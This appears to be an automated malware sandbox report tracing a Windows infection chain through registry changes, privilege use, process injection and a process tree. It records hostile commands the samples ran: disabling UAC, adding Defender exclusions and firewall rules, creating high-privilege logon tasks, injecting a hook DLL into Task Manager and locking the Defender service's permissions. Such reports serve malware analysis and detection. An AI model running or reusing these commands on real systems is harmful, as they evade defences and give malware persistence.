Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	a3AqhnOM26HOLUbeJBrM7Cj8.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	a3AqhnOM26HOLUbeJBrM7Cj8.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1112	powershell.exe
2256	toolspub2.exe
2256	toolspub2.exe
1112	Process not Found
1112	Process not Found
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE
3264	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3264	Explorer.EXE

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
636	Process not Found

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2256	toolspub2.exe
1636	ifsubgf

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4712	CasPol.exe
Token: SeDebugPrivilege	1112	powershell.exe
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeIncreaseQuotaPrivilege	3716	powershell.exe
Token: SeSecurityPrivilege	3716	powershell.exe
Token: SeTakeOwnershipPrivilege	3716	powershell.exe
Token: SeLoadDriverPrivilege	3716	powershell.exe
Token: SeSystemProfilePrivilege	3716	powershell.exe
Token: SeSystemtimePrivilege	3716	powershell.exe
Token: SeProfSingleProcessPrivilege	3716	powershell.exe
Token: SeIncBasePriorityPrivilege	3716	powershell.exe
Token: SeCreatePagefilePrivilege	3716	powershell.exe
Token: SeBackupPrivilege	3716	powershell.exe
Token: SeRestorePrivilege	3716	powershell.exe
Token: SeShutdownPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeSystemEnvironmentPrivilege	3716	powershell.exe
Token: SeRemoteShutdownPrivilege	3716	powershell.exe
Token: SeUndockPrivilege	3716	powershell.exe
Token: SeManageVolumePrivilege	3716	powershell.exe
Token: 33	3716	powershell.exe
Token: 34	3716	powershell.exe
Token: 35	3716	powershell.exe
Token: 36	3716	powershell.exe
Token: SeDebugPrivilege	2596	powershell.exe
Token: SeDebugPrivilege	3748	powershell.exe
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeDebugPrivilege	2988	powershell.exe
Token: SeShutdownPrivilege	1476	powercfg.exe
Token: SeCreatePagefilePrivilege	1476	powercfg.exe
Token: SeShutdownPrivilege	4520	powercfg.exe
Token: SeCreatePagefilePrivilege	4520	powercfg.exe
Token: SeShutdownPrivilege	4612	powercfg.exe
Token: SeCreatePagefilePrivilege	4612	powercfg.exe
Token: SeShutdownPrivilege	3940	powercfg.exe
Token: SeCreatePagefilePrivilege	3940	powercfg.exe
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeDebugPrivilege	4540	RRePNPVOIf5J4S3T5KoTi5nD.exe
Token: SeImpersonatePrivilege	4540	RRePNPVOIf5J4S3T5KoTi5nD.exe
Token: SeDebugPrivilege	488	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Token: SeImpersonatePrivilege	488	YrpWQ8hS3zHC70jtCtFVHNbD.exe
Token: SeShutdownPrivilege	3264	Explorer.EXE
Token: SeCreatePagefilePrivilege	3264	Explorer.EXE
Token: SeDebugPrivilege	3296	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Token: SeImpersonatePrivilege	3296	d21cbe21e38b385a41a68c5e6dd32f4c.exe
Token: SeIncreaseQuotaPrivilege	2988	powershell.exe
Token: SeSecurityPrivilege	2988	powershell.exe
Token: SeTakeOwnershipPrivilege	2988	powershell.exe
Token: SeLoadDriverPrivilege	2988	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4436	Broom.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4344 wrote to memory of 2392	4344	02c6afc6297dce33b1a7b9db1be1002387d0744222471657c224b763b06e03c0.exe	71
PID 4344 wrote to memory of 2392	4344	02c6afc6297dce33b1a7b9db1be1002387d0744222471657c224b763b06e03c0.exe	71
PID 4344 wrote to memory of 2392	4344	02c6afc6297dce33b1a7b9db1be1002387d0744222471657c224b763b06e03c0.exe	71
PID 4344 wrote to memory of 3920	4344	02c6afc6297dce33b1a7b9db1be1002387d0744222471657c224b763b06e03c0.exe	72
PID 4344 wrote to memory of 3920	4344	02c6afc6297dce33b1a7b9db1be1002387d0744222471657c224b763b06e03c0.exe	72
PID 4344 wrote to memory of 3920	4344	02c6afc6297dce33b1a7b9db1be1002387d0744222471657c224b763b06e03c0.exe	72
PID 4344 wrote to memory of 3296	4344	02c6afc6297dce33b1a7b9db1be1002387d0744222471657c224b763b06e03c0.exe	73
PID 4344 wrote to memory of 3296	4344	02c6afc6297dce33b1a7b9db1be1002387d0744222471657c224b763b06e03c0.exe	73
PID 4344 wrote to memory of 3296	4344	02c6afc6297dce33b1a7b9db1be1002387d0744222471657c224b763b06e03c0.exe	73
PID 4344 wrote to memory of 4544	4344	02c6afc6297dce33b1a7b9db1be1002387d0744222471657c224b763b06e03c0.exe	74
PID 4344 wrote to memory of 4544	4344	02c6afc6297dce33b1a7b9db1be1002387d0744222471657c224b763b06e03c0.exe	74
PID 4344 wrote to memory of 4544	4344	02c6afc6297dce33b1a7b9db1be1002387d0744222471657c224b763b06e03c0.exe	74
PID 2392 wrote to memory of 4436	2392	InstallSetup5.exe	75
PID 2392 wrote to memory of 4436	2392	InstallSetup5.exe	75
PID 2392 wrote to memory of 4436	2392	InstallSetup5.exe	75
PID 4344 wrote to memory of 348	4344	02c6afc6297dce33b1a7b9db1be1002387d0744222471657c224b763b06e03c0.exe	76
PID 4344 wrote to memory of 348	4344	02c6afc6297dce33b1a7b9db1be1002387d0744222471657c224b763b06e03c0.exe	76
PID 4544 wrote to memory of 1112	4544	Random.exe	77
PID 4544 wrote to memory of 1112	4544	Random.exe	77
PID 4544 wrote to memory of 1112	4544	Random.exe	77
PID 4544 wrote to memory of 4712	4544	Random.exe	78
PID 4544 wrote to memory of 4712	4544	Random.exe	78
PID 4544 wrote to memory of 4712	4544	Random.exe	78
PID 4544 wrote to memory of 4712	4544	Random.exe	78
PID 4544 wrote to memory of 4712	4544	Random.exe	78
PID 4544 wrote to memory of 4712	4544	Random.exe	78
PID 4544 wrote to memory of 4712	4544	Random.exe	78
PID 4544 wrote to memory of 4712	4544	Random.exe	78
PID 3920 wrote to memory of 2256	3920	Process not Found	80
PID 3920 wrote to memory of 2256	3920	Process not Found	80
PID 3920 wrote to memory of 2256	3920	Process not Found	80
PID 3920 wrote to memory of 2256	3920	Process not Found	80
PID 3920 wrote to memory of 2256	3920	Process not Found	80
PID 3920 wrote to memory of 2256	3920	Process not Found	80
PID 4712 wrote to memory of 4440	4712	CasPol.exe	82
PID 4712 wrote to memory of 4440	4712	CasPol.exe	82
PID 4712 wrote to memory of 4440	4712	CasPol.exe	82
PID 4712 wrote to memory of 3796	4712	CasPol.exe	83
PID 4712 wrote to memory of 3796	4712	CasPol.exe	83
PID 4712 wrote to memory of 3796	4712	CasPol.exe	83
PID 4712 wrote to memory of 4540	4712	CasPol.exe	81
PID 4712 wrote to memory of 4540	4712	CasPol.exe	81
PID 4712 wrote to memory of 4540	4712	CasPol.exe	81
PID 4712 wrote to memory of 488	4712	CasPol.exe	84
PID 4712 wrote to memory of 488	4712	CasPol.exe	84
PID 4712 wrote to memory of 488	4712	CasPol.exe	84
PID 3796 wrote to memory of 4008	3796	h29nA186woMosEfeurfG9Ftj.exe	86
PID 3796 wrote to memory of 4008	3796	h29nA186woMosEfeurfG9Ftj.exe	86
PID 3796 wrote to memory of 4008	3796	h29nA186woMosEfeurfG9Ftj.exe	86
PID 4712 wrote to memory of 4480	4712	CasPol.exe	85
PID 4712 wrote to memory of 4480	4712	CasPol.exe	85
PID 4712 wrote to memory of 4480	4712	CasPol.exe	85
PID 4480 wrote to memory of 2708	4480	a3AqhnOM26HOLUbeJBrM7Cj8.exe	87
PID 4480 wrote to memory of 2708	4480	a3AqhnOM26HOLUbeJBrM7Cj8.exe	87
PID 4480 wrote to memory of 2708	4480	a3AqhnOM26HOLUbeJBrM7Cj8.exe	87
PID 4480 wrote to memory of 2136	4480	a3AqhnOM26HOLUbeJBrM7Cj8.exe	88
PID 4480 wrote to memory of 2136	4480	a3AqhnOM26HOLUbeJBrM7Cj8.exe	88
PID 4480 wrote to memory of 2136	4480	a3AqhnOM26HOLUbeJBrM7Cj8.exe	88
PID 4480 wrote to memory of 2352	4480	a3AqhnOM26HOLUbeJBrM7Cj8.exe	89
PID 4480 wrote to memory of 2352	4480	a3AqhnOM26HOLUbeJBrM7Cj8.exe	89
PID 4480 wrote to memory of 2352	4480	a3AqhnOM26HOLUbeJBrM7Cj8.exe	89
PID 2352 wrote to memory of 1808	2352	a3AqhnOM26HOLUbeJBrM7Cj8.exe	90
PID 2352 wrote to memory of 1808	2352	a3AqhnOM26HOLUbeJBrM7Cj8.exe	90
PID 2352 wrote to memory of 1808	2352	a3AqhnOM26HOLUbeJBrM7Cj8.exe	90

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Random.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3264
- C:\Users\Admin\AppData\Local\Temp\02c6afc6297dce33b1a7b9db1be1002387d0744222471657c224b763b06e03c0.exe
  "C:\Users\Admin\AppData\Local\Temp\02c6afc6297dce33b1a7b9db1be1002387d0744222471657c224b763b06e03c0.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4344
- - C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
    "C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2392
  - - C:\Users\Admin\AppData\Local\Temp\Broom.exe
      C:\Users\Admin\AppData\Local\Temp\Broom.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4436
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    PID:3920
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:2256
- - C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
    "C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3296
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:3748
  - - C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe
      "C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"
      4⤵
      Windows security bypass
      Executes dropped EXE
      Windows security modification
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      PID:4468
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:3248
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:1060
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:5028
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        
        PID:3756
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:1816
- - C:\Users\Admin\AppData\Local\Temp\Random.exe
    "C:\Users\Admin\AppData\Local\Temp\Random.exe"
    3⤵
    - UAC bypass
    - Windows security bypass
    - Executes dropped EXE
    - Windows security modification
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID:4544
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Random.exe" -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1112
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
      4⤵
      Drops startup file
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4712
    - - C:\Users\Admin\Pictures\RRePNPVOIf5J4S3T5KoTi5nD.exe
        
        "C:\Users\Admin\Pictures\RRePNPVOIf5J4S3T5KoTi5nD.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4540
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4992
      - C:\Users\Admin\Pictures\RRePNPVOIf5J4S3T5KoTi5nD.exe
        
        "C:\Users\Admin\Pictures\RRePNPVOIf5J4S3T5KoTi5nD.exe"
        6⤵
        Windows security bypass
        Executes dropped EXE
        Windows security modification
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        
        PID:4016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2972
        
        C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        7⤵
        
        PID:4112
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        8⤵
        Modifies Windows Firewall
        
        PID:2496
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:3836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:3860
        
        C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        7⤵
        Executes dropped EXE
        Adds Run key to start application
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        
        PID:3280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1304
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        8⤵
        Creates scheduled task(s)
        Modifies data under HKEY_USERS
        
        PID:2496
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1816
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        8⤵
        
        PID:4952
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Drops file in System32 directory
        
        PID:2604
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        8⤵
        Executes dropped EXE
        
        PID:1300
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        8⤵
        Creates scheduled task(s)
        
        PID:1744
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        8⤵
        Executes dropped EXE
        
        PID:368
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        9⤵
        
        PID:3364
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        10⤵
        Launches sc.exe
        
        PID:4456
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        8⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
        8⤵
        Executes dropped EXE
        
        PID:1796
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn "csrss" /f
        9⤵
        
        PID:1112
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn "ScheduledUpdate" /f
        9⤵
        
        PID:1320
